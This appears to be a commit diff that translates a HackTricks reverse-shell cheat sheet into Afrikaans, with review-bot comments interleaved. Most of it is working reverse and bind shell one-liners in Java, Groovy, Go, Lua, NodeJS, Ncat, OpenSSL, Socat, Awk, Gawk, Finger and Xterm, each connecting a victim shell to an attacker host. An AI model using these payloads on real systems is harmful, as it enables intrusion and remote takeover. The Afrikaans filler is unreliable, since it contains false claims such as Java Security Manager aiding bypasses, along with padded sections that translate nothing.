- **Java Deserialisering-aanvalle**: Hierdie aanvaltegniek maak gebruik van swakplekke in die deserialiseringproses van Java-objekte om skadelike kodes uit te voer. Deur 'n kwaadwillige objek te skep en dit na 'n kwesbare toepassing te stuur, kan 'n hacker die uitvoering van skadelike kodes op die doelwitstelsel veroorsaak.
|
||||
|
||||
- **Java-beveiligingslekke**: Soos enige ander programmeertaal, het Java ook sy deel van beveiligingslekke. Hackers kan hierdie lekke uitbuit om toegang te verkry tot stelsels, data te ontgin of aanvalle uit te voer. Dit sluit in swakplekke in die Java-virtuele masjien, biblioteke en frameworks wat deur Java-toepassings gebruik word.
|
||||
|
||||
### Hulpmiddels vir Java-hacking
|
||||
|
||||
Daar is 'n verskeidenheid hulpmiddels beskikbaar vir hackers wat Java-hackingtegnieke wil toepas. Hier is 'n paar voorbeelde van sulke hulpmiddels:
|
||||
|
||||
- **Metasploit**: Metasploit is 'n kragtige raamwerk vir die ontwikkeling en uitvoering van aanvalskode. Dit bied 'n verskeidenheid modules en hulpmiddels wat spesifiek ontwerp is vir Java-hacking.
|
||||
|
||||
- **Java Decompilers**: Java Decompilers is hulpmiddels wat gebruik word om Java-kode te ontleed en te analiseer. Dit kan nuttig wees vir hackers om die werking van Java-toepassings te verstaan en swakplekke te identifiseer.
|
||||
|
||||
- **Burp Suite**: Burp Suite is 'n uitgebreide hulpmiddelstel vir webtoepassingtoetsing en -hacking. Dit bied 'n reeks modules en funksies wat spesifiek ontwerp is vir die identifisering en uitbuiting van swakplekke in Java-webtoepassings.
|
||||
|
||||
- **Java Security Manager**: Java Security Manager is 'n ingeboude hulpmiddel wat gebruik kan word om die toegang tot hulpbronne en funksies in Java-toepassings te beperk. Dit kan nuttig wees vir hackers om beperkings te omseil en toegang te verkry tot verbode hulpbronne.
|
||||
|
||||
### Slotwoord
|
||||
|
||||
Java bied 'n wye verskeidenheid hackingtegnieke en hulpmiddels vir hackers om toegang te verkry tot stelsels, data te ontgin en aanvalle uit te voer. Dit is belangrik vir hackers om 'n diepgaande begrip van die Java-programmeertaal en die veiligheidsmaatreëls daarvan te hê om suksesvolle aanvalle uit te voer.
|
||||
```bash
|
||||
r = Runtime.getRuntime()
|
||||
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
|
||||
p.waitFor()
|
||||
```
|
||||
|
||||
## Ncat
|
||||
|
||||
Ncat is a powerful networking utility that is included in the Nmap suite. It is designed to be a flexible and reliable tool for network exploration and security auditing. Ncat can be used to create and manage network connections, perform port scanning, and transfer files between systems.
|
||||
|
||||
### Basic Usage
|
||||
|
||||
To establish a basic TCP connection using Ncat, you can use the following command:
|
||||
|
||||
```
|
||||
ncat <target_ip> <port>
|
||||
```
|
||||
|
||||
Replace `<target_ip>` with the IP address of the target system and `<port>` with the desired port number.
|
||||
|
||||
### Port Scanning
|
||||
|
||||
Ncat can also be used for port scanning. To scan a range of ports on a target system, you can use the following command:
|
||||
|
||||
```
|
||||
ncat -v -z <target_ip> <start_port>-<end_port>
|
||||
```
|
||||
|
||||
Replace `<target_ip>` with the IP address of the target system, `<start_port>` with the starting port number, and `<end_port>` with the ending port number.
|
||||
|
||||
### File Transfer
|
||||
|
||||
Ncat supports file transfer between systems. To send a file from the local system to a remote system, you can use the following command:
|
||||
|
||||
```
|
||||
ncat -l <port> < file_to_send
|
||||
```
|
||||
|
||||
Replace `<port>` with the desired port number and `file_to_send` with the name of the file you want to send.
|
||||
|
||||
To receive a file on the local system, you can use the following command on the remote system:
|
||||
|
||||
```
|
||||
ncat <local_ip> <port> > file_to_receive
|
||||
```
|
||||
|
||||
Replace `<local_ip>` with the IP address of the local system, `<port>` with the desired port number, and `file_to_receive` with the name you want to give to the received file.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Ncat is a versatile tool that can be used for various networking tasks, including establishing network connections, performing port scanning, and transferring files between systems. Its flexibility and reliability make it a valuable asset for network exploration and security auditing.
|
||||
```bash
|
||||
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
|
||||
attacker> ncat -v 10.0.0.22 4444 --ssl
|
||||
```
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
***
|
||||
|
||||
## Golang
|
||||
|
||||
```bash
|
||||
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
|
||||
```
|
||||
|
||||
## Lua
|
||||
|
||||
Lua is 'n kragtige, vinnige en ligte skriptaal wat dikwels gebruik word vir die ontwikkeling van spelletjies, webtoepassings en ander sagteware. Dit bied 'n eenvoudige sintaksis en 'n klein geheue-afdruk, wat dit 'n gewilde keuse maak vir verskeie toepassings.
|
||||
|
||||
### Lua Skelms
|
||||
|
||||
#### Lua Skelms deur die opstel van 'n skadelike kode
|
||||
|
||||
Om 'n Lua-skelm te skep, kan jy skadelike kode in 'n Lua-skripsie insluit. Wanneer die skripsie uitgevoer word, sal die skadelike kode ook uitgevoer word. Dit kan gebruik word om verskeie aanvalle uit te voer, soos die uitvoering van skadelike instruksies, die verkryging van toegang tot die stelsel, of die verspreiding van malware.
|
||||
|
||||
#### Lua Skelms deur die manipulasie van bestaande skripsies
|
||||
|
||||
'n Ander metode om 'n Lua-skelm te skep, is deur die manipulasie van bestaande Lua-skripsies. Dit kan gedoen word deur die insluiting van skadelike kode in 'n bestaande skripsie, of deur die verandering van die funksionaliteit van 'n bestaande skripsie om skadelike aksies uit te voer.
|
||||
|
||||
### Lua Skelms Voorkoming
|
||||
|
||||
Om Lua-skripsieskelms te voorkom, moet jy sekuriteitsmaatreëls implementeer soos:
|
||||
|
||||
- Vertrou nie onbetroubare bronne nie en verifieer die bron van die skripsie voordat dit uitgevoer word.
|
||||
- Beperk die toegang tot die Lua-omgewing en beperk die funksies wat beskikbaar is vir uitvoering.
|
||||
- Monitor die uitvoering van Lua-skripsies vir enige verdagte aktiwiteit.
|
||||
- Verseker dat die Lua-omgewing opgedateer en gepatch is om bekende kwesbaarhede te voorkom.
|
||||
|
||||
### Lua Skelms Oplossings
|
||||
|
||||
As jy vermoed dat 'n Lua-skripsie 'n skelm bevat, kan jy die volgende stappe neem om dit op te los:
|
||||
|
||||
1. Verwyder die skadelike kode uit die skripsie.
|
||||
2. Verifieer die bron van die skripsie en verseker dat dit betroubaar is.
|
||||
3. Monitor die stelsel vir enige verdagte aktiwiteit en neem stappe om dit te beperk.
|
||||
4. Verseker dat die Lua-omgewing opgedateer en gepatch is om bekende kwesbaarhede te voorkom.
|
||||
|
||||
Deur hierdie maatreëls te implementeer, kan jy die risiko van Lua-skripsieskelms verminder en jou stelsel veilig hou.
|
||||
```bash
|
||||
#Linux
|
||||
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
||||
#Windows & Linux
|
||||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
|
||||
## NodeJS
|
||||
|
||||
NodeJS is 'n open-source, platform-onafhanklike uitvoeringsomgewing wat gebruik word vir die ontwikkeling van skaalbare en vinnige netwerktoepassings. Dit is gebou op die V8 JavaScript-enjin en maak gebruik van 'n nie-blokkerende I/O-model, wat beteken dat dit effektief kan omgaan met baie gelyktydige verbindings sonder om die prestasie te beïnvloed.
|
||||
|
||||
### Installasie
|
||||
|
||||
Om NodeJS op Linux te installeer, kan jy die volgende stappe volg:
|
||||
|
||||
1. Voer die volgende opdrag uit om die NodeJS-pakketbron te installeer:
|
||||
|
||||
```
|
||||
curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
|
||||
```
|
||||
|
||||
2. Installeer NodeJS deur die volgende opdrag uit te voer:
|
||||
|
||||
```
|
||||
sudo apt-get install -y nodejs
|
||||
```
|
||||
|
||||
3. Om te bevestig dat NodeJS suksesvol geïnstalleer is, kan jy die volgende opdrag uitvoer:
|
||||
|
||||
```
|
||||
node -v
|
||||
```
|
||||
|
||||
### Aan die gang
|
||||
|
||||
Om 'n nuwe NodeJS-projek te skep, kan jy die volgende stappe volg:
|
||||
|
||||
1. Skep 'n nuwe leë gids vir jou projek:
|
||||
|
||||
```
|
||||
mkdir myproject
|
||||
cd myproject
|
||||
```
|
||||
|
||||
2. Skep 'n nuwe `package.json`-lêer deur die volgende opdrag uit te voer:
|
||||
|
||||
```
|
||||
npm init -y
|
||||
```
|
||||
|
||||
3. Installeer enige afhanklikhede wat jy benodig vir jou projek deur die volgende opdrag uit te voer:
|
||||
|
||||
```
|
||||
npm install <afhanklikheid>
|
||||
```
|
||||
|
||||
4. Skep 'n nuwe JavaScript-lêer, byvoorbeeld `index.js`, en skryf jou NodeJS-kode daarin.
|
||||
|
||||
5. Voer jou NodeJS-program uit deur die volgende opdrag uit te voer:
|
||||
|
||||
```
|
||||
node index.js
|
||||
```
|
||||
|
||||
### Belangrike NodeJS-konsepte
|
||||
|
||||
Hier is 'n paar belangrike konsepte in NodeJS wat jy moet verstaan:
|
||||
|
||||
- **Modules**: NodeJS maak gebruik van modules om funksionaliteit te organiseer en te hergebruik. Jy kan modules invoer deur die `require`-funksie te gebruik.
|
||||
|
||||
- **Asynchrone programmering**: NodeJS maak gebruik van asynchrone programmering om nie-blokkerende I/O te bereik. Dit beteken dat jy funksies kan uitvoer sonder om te wag vir 'n antwoord, wat die algehele prestasie verbeter.
|
||||
|
||||
- **Evenementgedrewe programmering**: NodeJS is gebaseer op 'n evenementgedrewe model, waarin funksies uitgevoer word as reaksie op spesifieke gebeure. Jy kan luisteraars aanheg aan gebeure en funksies uitvoer wanneer die gebeurtenis plaasvind.
|
||||
|
||||
- **NPM**: NPM (Node Package Manager) is die standaard pakketsisteem vir NodeJS. Dit stel jou in staat om afhanklikhede te bestuur en te deel met ander ontwikkelaars.
|
||||
|
||||
- **Express**: Express is 'n gewilde webraamwerk vir NodeJS wat dit maklik maak om webtoepassings te bou. Dit bied 'n eenvoudige en elegante sintaksis vir die hantering van roetes, middelware en sjablone.
|
||||
|
||||
### Nuttige hulpbronne
|
||||
|
||||
Hier is 'n paar nuttige hulpbronne vir die leer en verbetering van jou NodeJS-vaardighede:
|
||||
|
||||
- [NodeJS-dokumentasie](https://nodejs.org/en/docs/)
|
||||
- [NPM-dokumentasie](https://docs.npmjs.com/)
|
||||
- [Express-dokumentasie](https://expressjs.com/)
|
||||
- [NodeJS-tutoriale](https://www.tutorialspoint.com/nodejs/index.htm)
|
||||
- [NodeJS-kursusse op Udemy](https://www.udemy.com/topic/nodejs/)
|
||||
```javascript
|
||||
(function(){
|
||||
var net = require("net"),
|
||||
cp = require("child_process"),
|
||||
sh = cp.spawn("/bin/sh", []);
|
||||
var client = new net.Socket();
|
||||
client.connect(8080, "10.17.26.64", function(){
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
});
|
||||
return /a/; // Prevents the Node.js application form crashing
|
||||
var net = require("net"),
|
||||
cp = require("child_process"),
|
||||
sh = cp.spawn("/bin/sh", []);
|
||||
var client = new net.Socket();
|
||||
client.connect(8080, "10.17.26.64", function(){
|
||||
client.pipe(sh.stdin);
|
||||
sh.stdout.pipe(client);
|
||||
sh.stderr.pipe(client);
|
||||
});
|
||||
return /a/; // Prevents the Node.js application form crashing
|
||||
})();
|
||||
|
||||
|
||||
|
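Review bot: the Lua one-liner `lua5.1 -e '... local f = io.popen(cmd, 'r') ...'` nests single quotes inside a single-quoted shell argument; it only works because the shell concatenates the pieces into `io.popen(cmd, r)` and Lua treats the undefined global `r` as nil, which defaults the mode to read. Write `io.popen(cmd, "r")` so the intent survives copy-paste into other shells. Same hunk: the `## Java` filler states that `Java Security Manager … kan nuttig wees vir hackers om beperkings te omseil`, which inverts what the Security Manager is (a restriction mechanism, not a bypass aid); the `## Ncat` block from `Ncat is a powerful networking utility` to `### Conclusion` is left in English and, like the Java, Lua and NodeJS paragraphs, has no source line it translates, so it should be dropped; and the Java reverse-shell fence is tagged ```` ```bash ```` although the body (`r = Runtime.getRuntime()`) is Groovy, so ```` ```groovy ```` or ```` ```java ```` would give correct highlighting.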
@ -248,19 +549,15 @@ or
|
|||
|
||||
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
|
||||
```
|
||||
|
||||
## OpenSSL
|
||||
|
||||
The Attacker (Kali)
|
||||
|
||||
Die Aanvaller (Kali)
|
||||
```bash
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||||
```
|
||||
|
||||
The Victim
|
||||
|
||||
Die Slagoffer
|
||||
```bash
|
||||
#Linux
|
||||
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
|
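Review bot: the third `openssl s_server` line still carries the typo `#Here yo will be able to get the response` (`yo` for `you`); it is a context line, but since the lines around it are being rewritten anyway this is the moment to fix it.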
@ -268,103 +565,176 @@ openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_clien
|
|||
#Windows
|
||||
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
```
|
||||
|
||||
## **Socat**
|
||||
|
||||
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
|
||||
|
||||
### Bind shell
|
||||
### Bind dop
|
||||
|
||||
'n Bind dop is 'n tipe dop wat gebruik word om 'n verbinding te skep tussen 'n aanvaller se masjien en 'n teiken masjien. Hierdie dop bind aan 'n spesifieke poort op die teiken masjien en wag vir 'n inkomende verbinding van die aanvaller. Die aanvaller kan dan gebruik maak van hierdie verbinding om beheer oor die teiken masjien te verkry.
|
||||
```bash
|
||||
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
|
||||
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
|
||||
```
|
||||
'n Reverse shell is 'n tegniek wat gebruik word deur 'n aanvaller om toegang te verkry tot 'n teikenstelsel vanaf 'n afstand. Dit behels die gebruik van 'n kwaadwillige kode wat op die teikenstelsel uitgevoer word en 'n verbinding met die aanvaller se stelsel vestig. Hierdie verbinding stel die aanvaller in staat om op afstand opdragte uit te voer en toegang te verkry tot die teikenstelsel se hulpbronne en data.
|
||||
|
||||
### Reverse shell
|
||||
'n Reverse shell kan op verskillende maniere geïmplementeer word, maar die algemene idee is om 'n verbinding te maak vanaf die teikenstelsel na die aanvaller se stelsel. Dit kan gedoen word deur gebruik te maak van 'n kwaadwillige program wat op die teikenstelsel uitgevoer word en 'n netwerkverbinding inisieer na die aanvaller se IP-adres en poortnommer. Die aanvaller kan dan 'n luisterende program op sy stelsel hê wat die inkomende verbinding aanvaar en 'n interaktiewe sessie met die teikenstelsel bied.
|
||||
|
||||
'n Reverse shell is 'n kragtige tegniek wat deur aanvallers gebruik word om toegang te verkry tot stelsels en netwerke. Dit is belangrik vir verdedigers om bewus te wees van hierdie tegniek en maatreëls te tref om dit te voorkom.
|
||||
```bash
|
||||
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
|
||||
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||
```
|
||||
|
||||
## Awk
|
||||
|
||||
Awk is 'n kragtige taal en hulpmiddel wat gebruik kan word om data te manipuleer en te verwerk in Linux. Dit is 'n ingeboude hulpmiddel in die meeste Linux-stelsels en kan gebruik word om te soek, filter, sorteer en transformeer data. Awk werk deur die lees van 'n reël van die invoer, dit te verdeel in velders en dan aksies uit te voer op die velders.
|
||||
|
||||
Awk kan gebruik word om verskeie take uit te voer, soos die soek na spesifieke patrone in 'n lêer, die berekening van statistieke, die manipulasie van data en die generering van verslae. Dit is 'n baie nuttige hulpmiddel vir die verwerking van groot hoeveelhede data en kan ook gebruik word in skrips om komplekse take te outomatiseer.
|
||||
|
||||
Hier is 'n paar voorbeelde van hoe Awk gebruik kan word:
|
||||
|
||||
### Soek na spesifieke patrone
|
||||
|
||||
```bash
|
||||
awk '/patroon/ { print }' lêernaam
|
||||
```
|
||||
|
||||
Hierdie opdrag sal soek na die spesifieke patroon in die lêer en enige reëls wat die patroon bevat, sal gedruk word.
|
||||
|
||||
### Berekening van statistieke
|
||||
|
||||
```bash
|
||||
awk '{ sum += $1 } END { print sum }' lêernaam
|
||||
```
|
||||
|
||||
Hierdie opdrag sal die som van die waardes in die eerste veld van elke reël in die lêer bereken en dit sal gedruk word wanneer die verwerking voltooi is.
|
||||
|
||||
### Manipulasie van data
|
||||
|
||||
```bash
|
||||
awk '{ $1 = "nuwe waarde" } { print }' lêernaam
|
||||
```
|
||||
|
||||
Hierdie opdrag sal die waarde van die eerste veld in elke reël in die lêer verander na "nuwe waarde" en die gewysigde reëls sal gedruk word.
|
||||
|
||||
Awk bied 'n baie kragtige en veelsydige manier om data te manipuleer en te verwerk in Linux. Dit is 'n nuttige hulpmiddel vir enigeen wat met data werk en kan help om komplekse take te vereenvoudig en te outomatiseer.
|
||||
```bash
|
||||
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
|
||||
```
|
||||
### Vinger
|
||||
|
||||
## Finger
|
||||
|
||||
**Attacker**
|
||||
|
||||
**Aanvaller**
|
||||
```bash
|
||||
while true; do nc -l 79; done
|
||||
```
|
||||
Om die bevel te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop)
|
||||
|
||||
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
|
||||
|
||||
**Victim**
|
||||
|
||||
**Slagoffer**
|
||||
```bash
|
||||
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
|
||||
|
||||
export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
|
||||
```
|
||||
|
||||
## Gawk
|
||||
|
||||
Gawk is 'n kragtige en veelsydige opdraggereëlverwerker wat dikwels gebruik word in Linux-stelsels. Dit kan gebruik word om teks te manipuleer, patrone te soek en te vervang, en data te verwerk. Gawk is 'n afkorting vir "GNU Awk" en is 'n verbeterde weergawe van die oorspronklike awk-program.
|
||||
|
||||
### Installasie
|
||||
|
||||
Om Gawk op 'n Linux-stelsel te installeer, kan jy die volgende opdrag gebruik:
|
||||
|
||||
```bash
|
||||
sudo apt-get install gawk
|
||||
```
|
||||
|
||||
### Gebruik
|
||||
|
||||
Gawk kan gebruik word om teks vanaf 'n lêer of die invoerstroom te verwerk. Dit kan ook gebruik word om data te manipuleer en te transformeer deur gebruik te maak van patrone en akties.
|
||||
|
||||
Om Gawk te gebruik, kan jy die volgende sintaks volg:
|
||||
|
||||
```bash
|
||||
gawk 'patroon { aktie }' lêernaam
|
||||
```
|
||||
|
||||
Hier is 'n paar voorbeelde van hoe Gawk gebruik kan word:
|
||||
|
||||
- Om 'n lêer te lees en die inhoud te druk:
|
||||
|
||||
```bash
|
||||
gawk '{ print }' lêernaam
|
||||
```
|
||||
|
||||
- Om 'n spesifieke patroon in 'n lêer te soek en die ooreenstemmende lyne te druk:
|
||||
|
||||
```bash
|
||||
gawk '/patroon/ { print }' lêernaam
|
||||
```
|
||||
|
||||
- Om 'n spesifieke kolom van 'n lêer te druk:
|
||||
|
||||
```bash
|
||||
gawk '{ print $kolomnommer }' lêernaam
|
||||
```
|
||||
|
||||
- Om 'n lêer te sorteer volgens 'n spesifieke kolom:
|
||||
|
||||
```bash
|
||||
gawk '{ print }' lêernaam | sort -k kolomnommer
|
||||
```
|
||||
|
||||
- Om data te manipuleer en te transformeer deur gebruik te maak van patrone en akties:
|
||||
|
||||
```bash
|
||||
gawk '/patroon/ { aktie }' lêernaam
|
||||
```
|
||||
|
||||
Dit is slegs 'n klein deel van die funksionaliteit wat Gawk bied. Vir meer inligting en gevorderde gebruik, kan jy die Gawk-dokumentasie raadpleeg.
|
||||
```bash
|
||||
#!/usr/bin/gawk -f
|
||||
|
||||
BEGIN {
|
||||
Port = 8080
|
||||
Prompt = "bkd> "
|
||||
Port = 8080
|
||||
Prompt = "bkd> "
|
||||
|
||||
Service = "/inet/tcp/" Port "/0/0"
|
||||
while (1) {
|
||||
do {
|
||||
printf Prompt |& Service
|
||||
Service |& getline cmd
|
||||
if (cmd) {
|
||||
while ((cmd |& getline) > 0)
|
||||
print $0 |& Service
|
||||
close(cmd)
|
||||
}
|
||||
} while (cmd != "exit")
|
||||
close(Service)
|
||||
}
|
||||
Service = "/inet/tcp/" Port "/0/0"
|
||||
while (1) {
|
||||
do {
|
||||
printf Prompt |& Service
|
||||
Service |& getline cmd
|
||||
if (cmd) {
|
||||
while ((cmd |& getline) > 0)
|
||||
print $0 |& Service
|
||||
close(cmd)
|
||||
}
|
||||
} while (cmd != "exit")
|
||||
close(Service)
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Xterm
|
||||
|
||||
This will try to connect to your system at port 6001:
|
||||
|
||||
Dit sal probeer om te verbind met jou stelsel by poort 6001:
|
||||
```bash
|
||||
xterm -display 10.0.0.1:1
|
||||
```
|
||||
|
||||
To catch the reverse shell you can use (which will listen in port 6001):
|
||||
|
||||
Om die omgekeerde dop te vang, kan jy gebruik maak van (wat sal luister op poort 6001):
|
||||
```bash
|
||||
# Authorize host
|
||||
xhost +targetip
|
||||
# Listen
|
||||
Xnest :1
|
||||
```
|
||||
|
||||
## Groovy
|
||||
|
||||
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy
|
||||
|
||||
deur [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTA: Java omgekeerde dop werk ook vir Groovy
|
||||
```bash
|
||||
String host="localhost";
|
||||
int port=8044;
|
||||
String cmd="cmd.exe";
|
||||
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
|
||||
```
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
||||
* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell)
|
||||
* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/)
|
||||
|
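Review bot: the added paragraph `'n Reverse shell is 'n tegniek wat gebruik word…` is placed between the bind-shell code fence and the `### Reverse shell` heading, so it renders under `### Bind dop` and describes the wrong technique there; move it (and the two paragraphs that follow) below the heading. Also in this hunk: `### Vinger` is inserted as a level-3 heading above the level-2 `## Finger` it translates, which breaks the page outline (use `## Vinger`); and the first Finger victim line `finger "$X"@<IP> 2> /dev/null')` contains an unbalanced `'` that the second, working variant on the next line does not, so the first variant should be corrected or removed rather than carried forward.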
@ -373,21 +743,21 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
|
|||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
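Review bot: the last bullet of this support list renders "github repos" as "github-opslag" (literally "storage"), while the same sentence in the MSFVenom page header translated in this same commit uses "github-repos"; the two pages should use one term, and "github-repos" is the one readers of the English page will recognise. The rest of the hunk is a straight translation of the footer and looks fine.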
@ -1,111 +1,112 @@
# MSFVenom - CheatSheet
# MSFVenom - Spiekbrief
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
